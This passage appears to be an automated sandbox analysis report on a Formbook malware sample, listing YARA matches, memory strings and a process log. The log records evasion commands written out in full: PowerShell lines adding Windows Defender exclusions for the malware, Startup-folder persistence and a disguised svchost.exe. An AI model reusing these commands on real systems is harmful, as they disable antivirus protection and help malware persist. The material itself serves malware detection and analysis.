                Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                Source: RYhdmjjr94.exe, 00000000.00000000.415482365.0000000000287000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMicrosoft.PythonTools.IronPython.dllz- vs RYhdmjjr94.exe
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs RYhdmjjr94.exe
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs RYhdmjjr94.exe
                Source: RYhdmjjr94.exe, 00000000.00000000.431822096.00000000029FC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameaspnet_compiler.exeT vs RYhdmjjr94.exe
                Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAntiDump.dll2 vs RYhdmjjr94.exe
                Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPE_MemoryProtection.exe4 vs RYhdmjjr94.exe
                Source: RYhdmjjr94.exeStatic PE information: invalid certificate
                Source: RYhdmjjr94.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeJump to behavior
                Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winEXE@122/68@0/2
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
                Source: RYhdmjjr94.exe, 00000000.00000000.395776508.0000000002A20000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                Source: RYhdmjjr94.exeVirustotal: Detection: 45%
                Source: RYhdmjjr94.exeMetadefender: Detection: 22%
                Source: RYhdmjjr94.exeReversingLabs: Detection: 51%
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile read: C:\Users\user\Desktop\RYhdmjjr94.exeJump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\RYhdmjjr94.exe 'C:\Users\user\Desktop\RYhdmjjr94.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /SpecialRun 4101d8 5136
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe'
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: unknownProcess created: C:\Users\Public\Documents\2FDD6624\svchost.exe 'C:\Users\Public\Documents\2FDD6624\svchost.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4328 -ip 4328
                Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Documents\2FDD6624\svchost.exe 'C:\Users\Public\Documents\2FDD6624\svchost.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2188
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /SpecialRun 4101d8 3132
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /SpecialRun 4101d8 4888
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /SpecialRun 4101d8 7052
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /SpecialRun 4101d8 7032
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
